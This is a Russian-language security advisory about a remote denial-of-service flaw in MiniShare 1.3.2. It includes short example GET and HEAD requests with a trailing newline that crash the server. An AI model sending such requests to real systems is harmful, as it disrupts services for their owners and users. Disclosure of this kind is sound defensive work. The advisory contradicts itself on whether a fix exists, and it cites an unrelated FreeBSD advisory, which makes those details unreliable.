Удалеенный отказ в обслуживании в MiniShare

Дата публикации:
26.05.2004
Всего просмотров:
675
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MiniShare 1.x
Уязвимые версии: MiniShare 1.3.2

Описание: Уязвимость обнаружена в MiniShare. Удаленный пользователь может аварийно завершить работу службы.

Удаленный пользователь может послать HTTP Get или HEAD запрос с одним символом новой строки, чтобы аварийно завершить работу Web сервера.

Пример/Эксплоит:

GET:
1. GET /something HTTP/1.1
2. GET /something HTTP/1.1\n
HEAD:
1. HEAD /something HTTP/1.1
2. HEAD /something HTTP/1.1\n

URL производителя: http://minishare.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: FreeBSD Security Advisory FreeBSD-SA-04:11.msync
DoS in MiniShare 1.3.2

или введите имя

CAPTCHA